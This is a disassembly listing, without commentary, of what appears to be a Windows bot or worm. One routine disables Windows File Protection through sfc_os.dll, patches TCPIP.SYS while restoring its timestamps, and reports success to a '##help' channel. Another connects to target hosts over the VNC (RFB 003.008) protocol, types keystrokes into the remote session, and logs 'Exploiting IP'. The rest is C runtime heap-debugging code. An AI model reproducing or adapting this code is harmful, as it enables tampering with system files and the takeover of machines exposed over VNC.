push eax
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_4F6488 ; MultiByteToWideChar
push offset aSfc_os_dll ; "sfc_os.dll"
call ds:dword_4F63C0 ; LoadLibraryA
push 5
push eax
call ds:dword_4F63C4 ; GetProcAddress
lea ecx, [ebp+var_200]
push 0FFFFFFFFh
push ecx
push 0
call eax ; GetUserNameA
leave
retn
sub_41C0EF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 3B0h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 46h
mov esi, eax
pop ecx
lea edi, [ebp-1B0h]
rep movsd
push 1
xor ebx, ebx
pop esi
mov dword ptr [ebp-60h], offset asc_452920 ; "L"
push esi
mov [eax+114h], esi
mov dword ptr [ebp-5Ch], offset dword_452924
mov dword ptr [ebp-58h], offset dword_452928
mov dword ptr [ebp-54h], offset dword_4F4628
mov dword ptr [ebp-50h], offset dword_45292C
mov dword ptr [ebp-4Ch], offset dword_452930
mov dword ptr [ebp-48h], offset dword_4F462C
mov dword ptr [ebp-44h], offset dword_4F4630
mov dword ptr [ebp-80h], offset dword_452934
mov dword ptr [ebp-7Ch], offset dword_452938
mov dword ptr [ebp-78h], offset dword_45293C
mov dword ptr [ebp-74h], offset dword_4F4634
mov dword ptr [ebp-70h], offset dword_452940
mov dword ptr [ebp-6Ch], offset dword_452944
mov dword ptr [ebp-68h], offset dword_4F4638
mov dword ptr [ebp-64h], offset dword_4F463C
mov dword ptr [ebp-34h], offset dword_452948
mov dword ptr [ebp-30h], offset dword_45294C
mov dword ptr [ebp-40h], offset dword_452950
mov dword ptr [ebp-3Ch], offset dword_452954
mov dword ptr [ebp-38h], offset dword_452958
mov [ebp-4], ebx
call _malloc
mov [ebp-8], eax
mov [ebp-0Ch], ebx
mov dword ptr [esp], 7530h
call ds:dword_4F6380 ; Sleep
lea eax, [ebp-1A8h]
push eax
call sub_41C0EF
pop ecx
mov edi, 80h
lea eax, [ebp-1A8h]
push edi
push eax
call ds:dword_4F639C ; SetFileAttributesA
push ebx
push edi
push 3
push ebx
push esi
lea eax, [ebp-1A8h]
push 80000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41C26E
lea eax, [ebp-90h]
push eax
lea eax, [ebp-98h]
push eax
lea eax, [ebp-88h]
push eax
push edi
call ds:dword_4F647C ; GetFileTime
push edi
call ds:dword_4F6370 ; CloseHandle
loc_41C26E: ; CODE XREF: .text:0041C249�j
lea eax, [ebp-1A8h]
push offset dword_45295C
push eax
call _fopen
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+8], eax
jnz short loc_41C2C5
push dword ptr [ebp-0A4h]
lea eax, [ebp-3B0h]
push offset aCanNotOpenTcpi ; "Can not open TCPIP.SYS, version %d."
push 200h
push eax
call __snprintf
lea eax, [ebp-3B0h]
push eax
call sub_415C77
push dword ptr [ebp-1ACh]
call sub_40BAAA
add esp, 18h
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_41C2C5: ; CODE XREF: .text:0041C286�j
mov eax, [ebp-0A4h]
dec eax
jz loc_41C49A
dec eax
jz loc_41C3ED
dec eax
jz loc_41C36A
dec eax
jnz loc_41C53E
mov dword ptr [ebp-2Ch], 130h
mov dword ptr [ebp-28h], 4F5A2h
xor edi, edi
loc_41C2F7: ; CODE XREF: .text:0041C32E�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp-8]
call sub_41EFA0
push esi
push dword ptr [ebp+edi-40h]
push dword ptr [ebp-8]
call _strncmp
add esp, 28h
test eax, eax
jnz short loc_41C328
inc dword ptr [ebp-4]
loc_41C328: ; CODE XREF: .text:0041C323�j
add edi, 4
cmp edi, 0Ch
jl short loc_41C2F7
cmp dword ptr [ebp-4], 3
jge loc_41C53E
mov [ebp-0Ch], esi
xor edi, edi
loc_41C33F: ; CODE XREF: .text:0041C363�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp+edi-40h]
call sub_421FE0
add edi, 4
add esp, 1Ch
cmp edi, 0Ch
jl short loc_41C33F
jmp loc_41C53E
; ---------------------------------------------------------------------------
loc_41C36A: ; CODE XREF: .text:0041C2DA�j
mov dword ptr [ebp-2Ch], 130h
mov dword ptr [ebp-28h], 4F322h
xor edi, edi
loc_41C37A: ; CODE XREF: .text:0041C3B1�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp-8]
call sub_41EFA0
push esi
push dword ptr [ebp+edi-34h]
push dword ptr [ebp-8]
call _strncmp
add esp, 28h
test eax, eax
jnz short loc_41C3AB
inc dword ptr [ebp-4]
loc_41C3AB: ; CODE XREF: .text:0041C3A6�j
add edi, 4
cmp edi, 8
jl short loc_41C37A
cmp dword ptr [ebp-4], 2
jge loc_41C53E
mov [ebp-0Ch], esi
xor edi, edi
loc_41C3C2: ; CODE XREF: .text:0041C3E6�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp+edi-34h]
call sub_421FE0
add edi, 4
add esp, 1Ch
cmp edi, 8
jl short loc_41C3C2
jmp loc_41C53E
; ---------------------------------------------------------------------------
loc_41C3ED: ; CODE XREF: .text:0041C2D3�j
mov dword ptr [ebp-2Ch], 130h
mov dword ptr [ebp-28h], 131h
mov dword ptr [ebp-24h], 132h
mov dword ptr [ebp-20h], 133h
mov dword ptr [ebp-1Ch], 4F5A2h
mov dword ptr [ebp-18h], 4F5A3h
mov dword ptr [ebp-14h], 4F5A4h
mov dword ptr [ebp-10h], 4F5A5h
xor edi, edi
loc_41C427: ; CODE XREF: .text:0041C45E�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp-8]
call sub_41EFA0
push esi
push dword ptr [ebp+edi-80h]
push dword ptr [ebp-8]
call _strncmp
add esp, 28h
test eax, eax
jnz short loc_41C458
inc dword ptr [ebp-4]
loc_41C458: ; CODE XREF: .text:0041C453�j
add edi, 4
cmp edi, 20h
jl short loc_41C427
cmp dword ptr [ebp-4], 8
jge loc_41C53E
mov [ebp-0Ch], esi
xor edi, edi
loc_41C46F: ; CODE XREF: .text:0041C493�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp+edi-80h]
call sub_421FE0
add edi, 4
add esp, 1Ch
cmp edi, 20h
jl short loc_41C46F
jmp loc_41C53E
; ---------------------------------------------------------------------------
loc_41C49A: ; CODE XREF: .text:0041C2CC�j
mov dword ptr [ebp-2Ch], 130h
mov dword ptr [ebp-28h], 131h
mov dword ptr [ebp-24h], 132h
mov dword ptr [ebp-20h], 133h
mov dword ptr [ebp-1Ch], 4F322h
mov dword ptr [ebp-18h], 4F323h
mov dword ptr [ebp-14h], 4F324h
mov dword ptr [ebp-10h], 4F325h
xor edi, edi
loc_41C4D4: ; CODE XREF: .text:0041C50B�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp-8]
call sub_41EFA0
push esi
push dword ptr [ebp+edi-60h]
push dword ptr [ebp-8]
call _strncmp
add esp, 28h
test eax, eax
jnz short loc_41C505
inc dword ptr [ebp-4]
loc_41C505: ; CODE XREF: .text:0041C500�j
add edi, 4
cmp edi, 20h
jl short loc_41C4D4
cmp dword ptr [ebp-4], 8
jge short loc_41C53E
mov [ebp-0Ch], esi
xor edi, edi
loc_41C518: ; CODE XREF: .text:0041C53C�j
push ebx
push dword ptr [ebp+edi-2Ch]
push dword ptr [ebp+8]
call _fseek
push dword ptr [ebp+8]
push esi
push esi
push dword ptr [ebp+edi-60h]
call sub_421FE0
add edi, 4
add esp, 1Ch
cmp edi, 20h
jl short loc_41C518
loc_41C53E: ; CODE XREF: .text:0041C2E1�j
; .text:0041C334�j ...
push dword ptr [ebp+8]
call _fclose
pop ecx
lea eax, [ebp-1A8h]
push ebx
push 80h
push 3
push ebx
push 2
push 40000000h
push eax
call ds:dword_4F63F4 ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41C58E
lea eax, [ebp-90h]
push eax
lea eax, [ebp-98h]
push eax
lea eax, [ebp-88h]
push eax
push esi
call ds:dword_4F6478 ; SetFileTime
push esi
call ds:dword_4F6370 ; CloseHandle
loc_41C58E: ; CODE XREF: .text:0041C569�j
cmp [ebp-0Ch], ebx
jz short loc_41C5DC
push dword ptr [ebp-0A4h]
lea eax, [ebp-3B0h]
push offset aTcpip_sysFixed ; "TCPIP.SYS fixed, version %d."
push 200h
push eax
call __snprintf
push ebx
lea eax, [ebp-3B0h]
push dword ptr [ebp-0A0h]
push eax
push offset aHelp ; "##help"
push dword ptr [ebp-1B0h]
call sub_409D6C
lea eax, [ebp-3B0h]
push eax
call sub_415C77
add esp, 28h
loc_41C5DC: ; CODE XREF: .text:0041C591�j
push dword ptr [ebp-1ACh]
mov dword_4401F0, ebx
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
; =============== S U B R O U T I N E =======================================
sub_41C5F5 proc near ; CODE XREF: sub_401CC7+5189�p
arg_0 = dword ptr 4
push esi
push 100h ; Size
mov esi, offset byte_4F4644
push 0 ; Val
push esi ; Dst
call _memset
add esp, 0Ch
push [esp+4+arg_0]
push offset aS_32 ; "%s"
push 0FFh ; Count
push esi ; Dest
call __snprintf
add esp, 10h
pop esi
retn
sub_41C5F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C624(int,char *Str,int)
sub_41C624 proc near ; CODE XREF: sub_41C76A+1A8�p
; sub_41C76A+1C5�p ...
var_14 = byte ptr -14h
var_C = byte ptr -0Ch
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push esi
push edi
mov esi, offset dword_4F4748
lea edi, [ebp+var_C]
mov ax, word_4529A8
movsd
movsb
mov esi, offset dword_4F4750
lea edi, [ebp+var_14]
mov [ebp+var_2], ax
mov ax, word_4529AC
movsd
mov [ebp+var_6], ax
mov ax, word_4F4744
movsw
mov [ebp+var_4], ax
mov eax, [ebp+arg_8]
xor esi, esi
cmp eax, esi
jnz loc_41C6F0
mov edi, [ebp+arg_0]
push ebx
mov ebx, [ebp+Str]
mov [ebp+arg_8], esi
loc_41C676: ; CODE XREF: sub_41C624+C7�j
mov eax, [ebp+arg_8]
sub eax, esi
jz short loc_41C696
dec eax
jnz short loc_41C6E4
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4E4270 ; send
push esi
push 1
lea eax, [ebp+var_4]
jmp short loc_41C6AA
; ---------------------------------------------------------------------------
loc_41C696: ; CODE XREF: sub_41C624+57�j
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4E4270 ; send
push esi
push 1
lea eax, [ebp+var_6]
loc_41C6AA: ; CODE XREF: sub_41C624+70�j
push eax
push edi
call dword_4E4270 ; send
push ebx ; Str
call _strlen
pop ecx
cmp eax, 2
push esi
jnz short loc_41C6C6
push 4
lea eax, [ebp+var_C]
jmp short loc_41C6CB
; ---------------------------------------------------------------------------
loc_41C6C6: ; CODE XREF: sub_41C624+99�j
push 5
lea eax, [ebp+var_14]
loc_41C6CB: ; CODE XREF: sub_41C624+A0�j
push eax
push edi
call dword_4E4270 ; send
push esi
push ebx ; Str
call _strlen
pop ecx
push eax
push ebx
push edi
call dword_4E4270 ; send
loc_41C6E4: ; CODE XREF: sub_41C624+5A�j
inc [ebp+arg_8]
cmp [ebp+arg_8], 1
jle short loc_41C676
pop ebx
jmp short loc_41C766
; ---------------------------------------------------------------------------
loc_41C6F0: ; CODE XREF: sub_41C624+42�j
dec eax
jz short loc_41C70F
dec eax
jnz short loc_41C766
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4E4270 ; send
push esi
push 1
lea eax, [ebp+var_4]
jmp short loc_41C726
; ---------------------------------------------------------------------------
loc_41C70F: ; CODE XREF: sub_41C624+CD�j
mov edi, [ebp+arg_0]
push esi
lea eax, [ebp+var_2]
push 1
push eax
push edi
call dword_4E4270 ; send
push esi
push 1
lea eax, [ebp+var_6]
loc_41C726: ; CODE XREF: sub_41C624+E9�j
push eax
push edi
call dword_4E4270 ; send
push [ebp+Str] ; Str
call _strlen
pop ecx
cmp eax, 2
push esi
jnz short loc_41C744
push 4
lea eax, [ebp+var_C]
jmp short loc_41C749
; ---------------------------------------------------------------------------
loc_41C744: ; CODE XREF: sub_41C624+117�j
push 5
lea eax, [ebp+var_14]
loc_41C749: ; CODE XREF: sub_41C624+11E�j
push eax
push edi
call dword_4E4270 ; send
push esi
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push edi
call dword_4E4270 ; send
loc_41C766: ; CODE XREF: sub_41C624+CA�j
; sub_41C624+D0�j
pop edi
pop esi
leave
retn
sub_41C624 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C76A proc near ; DATA XREF: .data:004493CC�o
var_288 = dword ptr -288h
Dst = byte ptr -88h
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = dword ptr -44h
var_38 = byte ptr -38h
var_28 = byte ptr -28h
Dest = byte ptr -20h
Str2 = byte ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = byte ptr -14h
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
Str = byte ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_14 = byte ptr 1Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_B0 = dword ptr 0B8h
push ebp
mov ebp, esp
sub esp, 288h
push ebx
push esi
push edi
mov esi, offset aRfb003_008 ; "RFB 003.008\n"
lea edi, [ebp+var_38]
mov ax, word_4529C4
movsd
movsd
movsd
movsb
mov esi, offset dword_4529C0
lea edi, [ebp+Str2]
movsw
movsb
mov esi, offset dword_4F4758
lea edi, [ebp+var_28]
movsd
movsb
mov esi, offset dword_4529CC
lea edi, [ebp+var_10]
movsw
movsb
mov esi, offset dword_4529D0
lea edi, [ebp+var_14]
movsw
movsb
mov esi, offset dword_4529D4
lea edi, [ebp+var_C]
movsw
movsb
mov word ptr [ebp+Str], ax
mov ax, word_4529C8
xor esi, esi
mov [ebp+var_16], ax
mov ax, word_4529D8
push esi
push 1
push 2
mov [ebp+var_18], ax
xor edi, edi
call dword_4E42A0 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_41C7F3
push eax
call dword_4E42B8 ; closesocket
loc_41C7F3: ; CODE XREF: sub_41C76A+80�j
lea eax, [ebp+arg_4]
mov [ebp+var_48], 2
push eax
call dword_4E4260 ; inet_addr
push [ebp+arg_A0]
mov [ebp+var_44], eax
call dword_4E4220 ; htons
mov [ebp+var_46], ax
lea eax, [ebp+var_48]
push 10h
push eax
push ebx
call dword_4E41C8 ; connect
test eax, eax
jnz loc_41C8EF
loc_41C82B: ; CODE XREF: sub_41C76A+133�j
; sub_41C76A+16A�j
push 40h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push esi
push 40h
push eax
push ebx
call dword_4E4238 ; recv
cmp eax, esi
jle loc_41C8FD
cmp eax, 0FFFFFFFFh
jz loc_41C8FD
mov eax, edi
sub eax, esi
jz short loc_41C89F
dec eax
jz short loc_41C86D
dec eax
jz short loc_41C8D9
jmp short loc_41C8CF
; ---------------------------------------------------------------------------
loc_41C86D: ; CODE XREF: sub_41C76A+FC�j
lea eax, [ebp+Str2]
push eax ; Str2
lea eax, [ebp+Dst]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_41C8EF
lea eax, [ebp+Str]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push ebx
call dword_4E4270 ; send
push 2
pop edi
jmp short loc_41C82B
; ---------------------------------------------------------------------------
loc_41C89F: ; CODE XREF: sub_41C76A+F9�j
lea eax, [ebp+var_38]
push eax ; Str2
lea eax, [ebp+Dst]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_41C8EF
lea eax, [ebp+var_38]
push esi
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+var_38]
push eax
push ebx
call dword_4E4270 ; send
push 1
pop edi
loc_41C8CF: ; CODE XREF: sub_41C76A+101�j
cmp edi, 3
jz short loc_41C8FD
jmp loc_41C82B
; ---------------------------------------------------------------------------
loc_41C8D9: ; CODE XREF: sub_41C76A+FF�j
lea eax, [ebp+var_28]
push eax ; Str2
lea eax, [ebp+Dst]
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_41C8FD
loc_41C8EF: ; CODE XREF: sub_41C76A+BB�j
; sub_41C76A+117�j ...
push ebx
call dword_4E42B8 ; closesocket
xor eax, eax
jmp loc_41CA86
; ---------------------------------------------------------------------------
loc_41C8FD: ; CODE XREF: sub_41C76A+E6�j
; sub_41C76A+EF�j ...
push esi
lea eax, [ebp+var_16]
push 1
push eax
push ebx
call dword_4E4270 ; send
lea eax, [ebp+var_10]
push 1 ; int
push eax ; Str
push ebx ; int
call sub_41C624
mov esi, ds:dword_4F6380
add esp, 0Ch
mov edi, 3E8h
push edi
call esi ; Sleep
lea eax, [ebp+var_18]
push 0 ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 0Ch
push edi
call esi ; Sleep
lea eax, [ebp+var_10]
push 2 ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 0Ch
push edi
call esi ; Sleep
and [ebp+var_4], 0
mov edi, offset byte_4F4644
push edi ; Str
call _strlen
test eax, eax
pop ecx
jbe short loc_41C99D
loc_41C960: ; CODE XREF: sub_41C76A+231�j
mov eax, [ebp+var_4]
movsx eax, byte_4F4644[eax]
push eax
push offset aC_4 ; "%c"
lea eax, [ebp+Dest]
push 3 ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+Dest]
push 0 ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 1Ch
push 7Dh
call esi ; Sleep
inc [ebp+var_4]
push edi ; Str
call _strlen
cmp [ebp+var_4], eax
pop ecx
jb short loc_41C960
loc_41C99D: ; CODE XREF: sub_41C76A+1F4�j
lea eax, [ebp+var_C]
push 0 ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 0Ch
push 0FA0h
call esi ; Sleep
push 2
pop edi
loc_41C9B6: ; CODE XREF: sub_41C76A+263�j
lea eax, [ebp+var_14]
push 0 ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 0Ch
push 12Ch
call esi ; Sleep
dec edi
jnz short loc_41C9B6
mov edi, 7D0h
push edi
call esi ; Sleep
lea eax, [ebp+var_C]
push 0 ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 0Ch
push edi
call esi ; Sleep
xor edi, edi
lea eax, [ebp+var_14]
push edi ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 0Ch
push 190h
call esi ; Sleep
mov [ebp+var_4], 2
loc_41CA07: ; CODE XREF: sub_41C76A+2B5�j
push 258h
call esi ; Sleep
lea eax, [ebp+var_C]
push edi ; int
push eax ; Str
push ebx ; int
call sub_41C624
add esp, 0Ch
dec [ebp+var_4]
jnz short loc_41CA07
push ebx
call dword_4E42B8 ; closesocket
lea eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_A8]
shl eax, 6
add eax, offset aSymantec ; "Symantec"
push eax
push offset aSExploitingIpS ; "[%s]: Exploiting IP: %s."
lea eax, [ebp+var_288]
push 1FFh ; Count
push eax ; Dest
call __snprintf
push edi ; int
lea eax, [ebp+var_288]
push [ebp+arg_B0] ; int
push eax ; int
lea eax, [ebp+arg_14]
push eax ; Str
push [ebp+arg_0] ; int
call sub_409D6C
mov eax, [ebp+arg_A8]
add esp, 28h
shl eax, 6
inc dword_449250[eax]
push 1
lea eax, dword_449250[eax]
pop eax
loc_41CA86: ; CODE XREF: sub_41C76A+18E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C76A endp
; ---------------------------------------------------------------------------
align 10h
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BE BYTES: COLLAPSED FUNCTION __fclose_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000026 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION __malloc_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005D BYTES: COLLAPSED FUNCTION __nh_malloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41CD3D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000038 BYTES: COLLAPSED CHUNK OF FUNCTION __nh_malloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000313 BYTES: COLLAPSED FUNCTION __heap_alloc_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000024 BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION __calloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000063 BYTES: COLLAPSED FUNCTION __realloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41D1E3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION __realloc_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000511 BYTES: COLLAPSED FUNCTION _realloc_help. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000024 BYTES: COLLAPSED FUNCTION __expand. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000063 BYTES: COLLAPSED FUNCTION __expand_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41D7C3. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION __expand_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000013 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_41D8A0
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000052 BYTES: COLLAPSED FUNCTION __free_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41D882. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION __free_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D8A0 proc near ; CODE XREF: .text:0041D819�p
; __free_dbg+3C�p
Dst = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, dword_452A00
and eax, 4
test eax, eax
jz short loc_41D8E3
loc_41D8B3: ; CODE XREF: sub_41D8A0+41�j
call sub_41DFF0
test eax, eax
jnz short loc_41D8DD
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0 ; int
push 402h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D8DD
int 3 ; Trap to Debugger
loc_41D8DD: ; CODE XREF: sub_41D8A0+1A�j
; sub_41D8A0+3A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D8B3
loc_41D8E3: ; CODE XREF: sub_41D8A0+11�j
cmp [ebp+arg_0], 0
jnz short loc_41D8EE
jmp loc_41DC85
; ---------------------------------------------------------------------------
loc_41D8EE: ; CODE XREF: sub_41D8A0+47�j
push 0
push 0
push 0
mov edx, [ebp+arg_4]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
push 3
call off_452DD0 ; Microsoft VisualC 2-8/net runtime
add esp, 1Ch
test eax, eax
jnz short loc_41D938
loc_41D90D: ; CODE XREF: sub_41D8A0+91�j
push offset aClientHookFree ; "Client hook free failure.\n"
push offset aS_33 ; "%s"
push 0 ; int
push 0 ; Value
push 0 ; int
push 0 ; int
call __CrtDbgReport
add esp, 18h
cmp eax, 1
jnz short loc_41D92D
int 3 ; Trap to Debugger
loc_41D92D: ; CODE XREF: sub_41D8A0+8A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41D90D
jmp loc_41DC85
; ---------------------------------------------------------------------------
loc_41D938: ; CODE XREF: sub_41D8A0+6B�j
; sub_41D8A0+CD�j
mov edx, [ebp+arg_0]
push edx
call sub_41E4D0
add esp, 4
test eax, eax
jnz short loc_41D969
push offset a_crtisvalidhea ; "_CrtIsValidHeapPointer(pUserData)"
push 0 ; int
push 414h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D969
int 3 ; Trap to Debugger
loc_41D969: ; CODE XREF: sub_41D8A0+A6�j
; sub_41D8A0+C6�j
xor eax, eax
test eax, eax
jnz short loc_41D938
mov ecx, [ebp+arg_0]
sub ecx, 20h
mov [ebp+Dst], ecx
loc_41D978: ; CODE XREF: sub_41D8A0+12F�j
mov edx, [ebp+Dst]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 4
jz short loc_41D9CB
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 1
jz short loc_41D9CB
mov edx, [ebp+Dst]
mov eax, [edx+14h]
and eax, 0FFFFh
cmp eax, 2
jz short loc_41D9CB
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 3
jz short loc_41D9CB
push offset a_block_type_is ; "_BLOCK_TYPE_IS_VALID(pHead->nBlockUse)"
push 0 ; int
push 41Ah ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41D9CB
int 3 ; Trap to Debugger
loc_41D9CB: ; CODE XREF: sub_41D8A0+E6�j
; sub_41D8A0+EF�j ...
xor edx, edx
test edx, edx
jnz short loc_41D978
mov eax, dword_452A00
and eax, 4
test eax, eax
jnz loc_41DAA6
push 4
mov cl, byte_452A0C
push ecx
mov edx, [ebp+Dst]
add edx, 1Ch
push edx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41DA40
loc_41D9FD: ; CODE XREF: sub_41D8A0+19E�j
mov eax, [ebp+Dst]
add eax, 20h
push eax
mov ecx, [ebp+Dst]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+Dst]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_452A10[ecx*4]
push edx ; char
push offset aDamageBeforeHs ; "DAMAGE: before %hs block (#%d) at 0x%08"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 1 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41DA3A
int 3 ; Trap to Debugger
loc_41DA3A: ; CODE XREF: sub_41D8A0+197�j
xor eax, eax
test eax, eax
jnz short loc_41D9FD
loc_41DA40: ; CODE XREF: sub_41D8A0+15B�j
push 4
mov cl, byte_452A0C
push ecx
mov edx, [ebp+Dst]
mov eax, [edx+10h]
mov ecx, [ebp+Dst]
lea edx, [ecx+eax+20h]
push edx
call _CheckBytes
add esp, 0Ch
test eax, eax
jnz short loc_41DAA6
loc_41DA63: ; CODE XREF: sub_41D8A0+204�j
mov eax, [ebp+Dst]
add eax, 20h
push eax
mov ecx, [ebp+Dst]
mov edx, [ecx+18h]
push edx
mov eax, [ebp+Dst]
mov ecx, [eax+14h]
and ecx, 0FFFFh
mov edx, off_452A10[ecx*4]
push edx ; char
push offset aDamageAfterHsB ; "DAMAGE: after %hs block (#%d) at 0x%08X"...
push 0 ; int
push 0 ; Value
push 0 ; int
push 1 ; int
call __CrtDbgReport
add esp, 20h
cmp eax, 1
jnz short loc_41DAA0
int 3 ; Trap to Debugger
loc_41DAA0: ; CODE XREF: sub_41D8A0+1FD�j
xor eax, eax
test eax, eax
jnz short loc_41DA63
loc_41DAA6: ; CODE XREF: sub_41D8A0+13B�j
; sub_41D8A0+1C1�j
mov ecx, [ebp+Dst]
cmp dword ptr [ecx+14h], 3
jnz short loc_41DB1B
